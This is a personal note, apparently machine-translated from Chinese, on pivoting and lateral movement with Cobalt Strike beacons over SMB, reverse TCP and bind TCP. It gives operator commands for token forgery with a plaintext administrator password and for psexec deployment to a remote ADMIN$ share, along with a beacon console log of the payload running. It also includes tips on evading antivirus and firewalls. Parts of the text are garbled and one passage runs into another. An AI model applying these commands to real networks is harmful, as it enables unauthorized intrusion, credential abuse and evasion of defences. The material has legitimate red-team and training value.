Preface: records about themselves, so after forgotten
SMB Beacon on the line:
For the environment: There has been a springboard machine, and need not be a target penetration network, but can be a springboard for SMB communications and the current machine
Benefits: There are certain prevent traceability, the biggest advantage is to avoid the effect of a firewall
Here that circumvent firewalls effect is reflected in where?
A: Windows Defender firewall does not block traffic SMB's go!
Limitations: Only use PsExec or Stageless Payload on line
command:
rev2self //返回到初始的令牌
make_token pengtest\administrator adexx!@#QWE //伪造令牌
psexec WIN-CKT0M35R6UO ADMIN$ smb //psexec横向Directly on-line, in theory, because of Stageless and psexec can not be achieved without documents, so when there is virus may not be on the line!
What reason is there to say it? You can get to know and realize under the principle Stageless and psexec!
Command flow:
beacon> rev2self
[*] Tasked beacon to revert token
[+] host called home, sent: 8 bytes
beacon> make_token pengtest\administrator adexx!@#QWE
[*] Tasked beacon to create a token for pengtest\administrator
[+] host called home, sent: 52 bytes
[+] Impersonated PENTEST\yuyonghu01
beacon> psexec WIN-CKT0M35R6UO ADMIN$ smb
[*] Tasked beacon to run windows/beacon_smb/bind_pipe (\\WIN-CKT0M35R6UO\pipe\status_7771) on WIN-CKT0M35R6UO via Service Control Manager (\\WIN-CKT0M35R6UO\ADMIN$\c31c12f.exe)
[+] host called home, sent: 219981 bytes
[+] received output:
Started service 8b04b51 on WIN-CKT0M35R6Uunlink 可以暂时断开和目标 Beacon 的连接,但不会退出进程
link 重新连接回去,两者都需要在发起连接的 Beacon 上执行,意思就是都是在跳板机上进行操作!Reverse TCP Beacon上线:
Note: This can not be added directly in the Listeners, you need right there Beacon - Pivoting - Listener add
And then generate stageless payload horizontal, which if found net use does not work, remember to think of themselves long before written IPC.exe, because it is the windows api calls have a certain role to avoid the AV!
IPC pipe connection and perform a scheduled task to run the specified program
Also you need to know the unlink command once will not be able to reconnect disconnected
Bind TCP Beacon on-line:
For the environment: There has been a springboard machine, and need not be a target penetration network, but can be a springboard for the current TCP communications and machine
Limitations: Because it is a positive connection can only be used Stageless Payload or psexec
Disadvantages: Although modify the default port 4444 when adding the listening port to 5555, the target host will still monitor 4444, can only say that the author of the reasons for writing CS, but in fact can still be changed!
connect to reconnect
unlink disconnect the communication, but still can reconnect
requires attention:
1, if the unlink performed simultaneously in the same Beacon link and connect the machine, it will be drained away both
2, this does not add directly in the Listeners need right there Beacon - Pivoting - Listener add
Reference article: https: //www.chabug.org/tools/755.html